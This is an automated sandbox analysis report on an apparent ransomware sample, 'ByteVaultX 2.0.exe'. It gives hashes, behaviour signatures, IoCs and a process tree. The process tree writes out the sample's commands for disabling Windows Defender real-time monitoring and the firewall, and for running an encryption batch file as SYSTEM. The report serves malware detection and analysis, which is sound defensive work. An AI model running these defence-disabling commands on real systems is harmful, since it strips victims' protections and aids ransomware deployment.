Resubmissions
22-05-2024 15:54
240522-tca45sgd54 1022-05-2024 15:32
240522-syx1csfh7z 1019-05-2024 21:56
240519-1tcgvsca5s 1019-05-2024 21:54
240519-1sln5sbh9x 1019-05-2024 21:53
240519-1rn3wabh6x 1019-05-2024 20:56
240519-zq5hsshf3v 1018-05-2024 09:15
240518-k76pvsda89 1018-05-2024 00:54
240518-a9ph9acb22 10Analysis
-
max time kernel
970s -
max time network
975s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
18-05-2024 09:15
Behavioral task
behavioral1
Sample
ByteVaultX 2.0.exe
Resource
win10v2004-20240426-en
General
-
Target
ByteVaultX 2.0.exe
-
Size
9.9MB
-
MD5
98e3408a9432d5046691c4cc744eb244
-
SHA1
c1e9d2c89d2cb72ee2f0f11ef97b2cb07d070142
-
SHA256
958e65dedf5f42e310cbf4e7ba87ce130c2b60d95afb1da8f7390f2002f6caa2
-
SHA512
dd4451441a051a6e9cc1be16702aaea1ce0fee4bd78c30cde050636e573b0ec1fcae4cde654a1928c941410840b8d0f989932779fc59e7bf70ce444029e689d5
-
SSDEEP
196608:ShFaRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:tGFG8S1+TtIi+Y9Z8D8CclydoPx
Malware Config
Extracted
https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg
Extracted
C:\Encrypt\encrypt.html
Signatures
-
Renames multiple (146) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeflow pid process 46 1324 powershell.exe 48 1320 powershell.exe 49 5720 powershell.exe 56 6132 powershell.exe 61 5712 powershell.exe 62 5988 powershell.exe 63 5748 powershell.exe 64 1500 powershell.exe 65 5416 powershell.exe 66 5396 powershell.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 36 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 5812 netsh.exe 6080 netsh.exe 5836 netsh.exe 5976 netsh.exe 724 netsh.exe 4256 netsh.exe 5924 netsh.exe 5956 netsh.exe 5892 netsh.exe 5776 netsh.exe 5472 netsh.exe 2436 netsh.exe 4772 netsh.exe 5860 netsh.exe 2580 netsh.exe 6092 netsh.exe 5920 netsh.exe 5960 netsh.exe 3680 netsh.exe 6052 netsh.exe 3372 netsh.exe 5712 netsh.exe 4032 netsh.exe 6128 netsh.exe 6084 netsh.exe 1588 netsh.exe 3240 netsh.exe 3024 netsh.exe 5776 netsh.exe 5092 netsh.exe 4356 netsh.exe 5672 netsh.exe 5872 netsh.exe 5988 netsh.exe 6020 netsh.exe 6088 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ByteVaultX 2.0.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation ByteVaultX 2.0.exe -
Loads dropped DLL 12 IoCs
Processes:
ByteVaultX 2.0.exepid process 2576 ByteVaultX 2.0.exe 2576 ByteVaultX 2.0.exe 2576 ByteVaultX 2.0.exe 2576 ByteVaultX 2.0.exe 2576 ByteVaultX 2.0.exe 2576 ByteVaultX 2.0.exe 2576 ByteVaultX 2.0.exe 2576 ByteVaultX 2.0.exe 2576 ByteVaultX 2.0.exe 2576 ByteVaultX 2.0.exe 2576 ByteVaultX 2.0.exe 2576 ByteVaultX 2.0.exe -
Drops desktop.ini file(s) 8 IoCs
Processes:
ByteVaultX 2.0.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Music\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Videos\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Documents\desktop.ini ByteVaultX 2.0.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3216 powershell.exe 5360 powershell.exe 5800 powershell.exe 5352 powershell.exe 3536 powershell.exe 5572 powershell.exe 2352 powershell.exe 3164 powershell.exe 5324 powershell.exe 6096 powershell.exe 4616 powershell.exe 5712 powershell.exe 1500 powershell.exe 6132 powershell.exe 5616 powershell.exe 2980 powershell.exe 2208 powershell.exe 5744 powershell.exe 6112 powershell.exe 1808 powershell.exe 5512 powershell.exe 5268 powershell.exe 5416 powershell.exe 5516 powershell.exe 5412 powershell.exe 3024 powershell.exe 3008 powershell.exe 3024 powershell.exe 1016 powershell.exe 5992 powershell.exe 2276 powershell.exe 5676 powershell.exe 3024 powershell.exe 4612 powershell.exe 5220 powershell.exe 5988 powershell.exe 5148 powershell.exe 5816 powershell.exe 1196 powershell.exe 3324 powershell.exe 1696 powershell.exe 5552 powershell.exe 5256 powershell.exe 4308 powershell.exe 3324 powershell.exe 4472 powershell.exe 5672 powershell.exe 5348 powershell.exe 1196 powershell.exe 1324 powershell.exe 3708 powershell.exe 1644 powershell.exe 5720 powershell.exe 5556 powershell.exe 5208 powershell.exe 6132 powershell.exe 5372 powershell.exe 4292 powershell.exe 4624 powershell.exe 1484 powershell.exe 5396 powershell.exe 1060 powershell.exe 1320 powershell.exe 5416 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 5 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeidentity_helper.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1808 powershell.exe 1808 powershell.exe 2064 msedge.exe 2064 msedge.exe 4848 msedge.exe 4848 msedge.exe 2980 powershell.exe 2980 powershell.exe 2980 powershell.exe 4472 powershell.exe 4472 powershell.exe 4472 powershell.exe 1696 powershell.exe 1696 powershell.exe 1696 powershell.exe 2208 powershell.exe 2208 powershell.exe 2208 powershell.exe 4616 powershell.exe 4616 powershell.exe 4616 powershell.exe 3212 identity_helper.exe 3212 identity_helper.exe 3164 powershell.exe 3164 powershell.exe 3164 powershell.exe 3024 powershell.exe 3024 powershell.exe 3024 powershell.exe 1196 powershell.exe 1196 powershell.exe 1196 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 3216 powershell.exe 3216 powershell.exe 3216 powershell.exe 2276 powershell.exe 2276 powershell.exe 2276 powershell.exe 1324 powershell.exe 1324 powershell.exe 1324 powershell.exe 1712 powershell.exe 1712 powershell.exe 1712 powershell.exe 1320 powershell.exe 1320 powershell.exe 1320 powershell.exe 5208 powershell.exe 5208 powershell.exe 5208 powershell.exe 5360 powershell.exe 5360 powershell.exe 5360 powershell.exe 5552 powershell.exe 5552 powershell.exe 5552 powershell.exe 5676 powershell.exe 5676 powershell.exe 5676 powershell.exe 5800 powershell.exe 5800 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
Processes:
msedge.exepid process 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 2980 powershell.exe Token: SeDebugPrivilege 4472 powershell.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeDebugPrivilege 2208 powershell.exe Token: SeDebugPrivilege 4616 powershell.exe Token: SeDebugPrivilege 3164 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 1196 powershell.exe Token: SeDebugPrivilege 4612 powershell.exe Token: SeDebugPrivilege 3216 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeDebugPrivilege 5208 powershell.exe Token: SeDebugPrivilege 5360 powershell.exe Token: SeDebugPrivilege 5552 powershell.exe Token: SeDebugPrivilege 5676 powershell.exe Token: SeDebugPrivilege 5800 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 5220 powershell.exe Token: SeDebugPrivilege 1644 powershell.exe Token: SeDebugPrivilege 5512 powershell.exe Token: SeDebugPrivilege 5416 powershell.exe Token: SeDebugPrivilege 5656 powershell.exe Token: SeDebugPrivilege 5720 powershell.exe Token: SeDebugPrivilege 5956 powershell.exe Token: SeDebugPrivilege 6132 powershell.exe Token: SeDebugPrivilege 5256 powershell.exe Token: SeDebugPrivilege 5352 powershell.exe Token: SeDebugPrivilege 3536 powershell.exe Token: SeDebugPrivilege 5572 powershell.exe Token: SeDebugPrivilege 5744 powershell.exe Token: SeDebugPrivilege 5268 powershell.exe Token: SeDebugPrivilege 4292 powershell.exe Token: SeDebugPrivilege 5412 powershell.exe Token: SeDebugPrivilege 5372 powershell.exe Token: SeDebugPrivilege 5368 powershell.exe Token: SeDebugPrivilege 5556 powershell.exe Token: SeDebugPrivilege 5712 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 5988 powershell.exe Token: SeDebugPrivilege 5148 powershell.exe Token: SeDebugPrivilege 4308 powershell.exe Token: SeDebugPrivilege 5816 powershell.exe Token: SeDebugPrivilege 5672 powershell.exe Token: SeDebugPrivilege 5796 powershell.exe Token: SeDebugPrivilege 3324 powershell.exe Token: SeDebugPrivilege 5348 powershell.exe Token: SeDebugPrivilege 6128 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 4624 powershell.exe Token: SeDebugPrivilege 1196 powershell.exe Token: SeDebugPrivilege 5748 powershell.exe Token: SeDebugPrivilege 5752 powershell.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 6132 powershell.exe Token: SeDebugPrivilege 2352 powershell.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 5616 powershell.exe Token: SeDebugPrivilege 1484 powershell.exe Token: SeDebugPrivilege 5324 powershell.exe -
Suspicious use of FindShellTrayWindow 43 IoCs
Processes:
msedge.exepid process 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe -
Suspicious use of SendNotifyMessage 42 IoCs
Processes:
msedge.exepid process 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe 4848 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ByteVaultX 2.0.exeByteVaultX 2.0.exemsedge.execmd.exedescription pid process target process PID 1924 wrote to memory of 2576 1924 ByteVaultX 2.0.exe ByteVaultX 2.0.exe PID 1924 wrote to memory of 2576 1924 ByteVaultX 2.0.exe ByteVaultX 2.0.exe PID 2576 wrote to memory of 1808 2576 ByteVaultX 2.0.exe powershell.exe PID 2576 wrote to memory of 1808 2576 ByteVaultX 2.0.exe powershell.exe PID 2576 wrote to memory of 724 2576 ByteVaultX 2.0.exe netsh.exe PID 2576 wrote to memory of 724 2576 ByteVaultX 2.0.exe netsh.exe PID 2576 wrote to memory of 4508 2576 ByteVaultX 2.0.exe runas.exe PID 2576 wrote to memory of 4508 2576 ByteVaultX 2.0.exe runas.exe PID 2576 wrote to memory of 4848 2576 ByteVaultX 2.0.exe msedge.exe PID 2576 wrote to memory of 4848 2576 ByteVaultX 2.0.exe msedge.exe PID 4848 wrote to memory of 5100 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 5100 4848 msedge.exe msedge.exe PID 2576 wrote to memory of 4512 2576 ByteVaultX 2.0.exe cmd.exe PID 2576 wrote to memory of 4512 2576 ByteVaultX 2.0.exe cmd.exe PID 4512 wrote to memory of 1512 4512 cmd.exe reg.exe PID 4512 wrote to memory of 1512 4512 cmd.exe reg.exe PID 4512 wrote to memory of 1204 4512 cmd.exe reg.exe PID 4512 wrote to memory of 1204 4512 cmd.exe reg.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 3752 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 2064 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 2064 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 2480 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 2480 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 2480 4848 msedge.exe msedge.exe PID 4848 wrote to memory of 2480 4848 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"2⤵
- Checks computer location settings
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
C:\Windows\SYSTEM32\runas.exerunas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9323446f8,0x7ff932344708,0x7ff9323447184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2172 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,13682142361098883201,1094879758327066053,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:14⤵
-
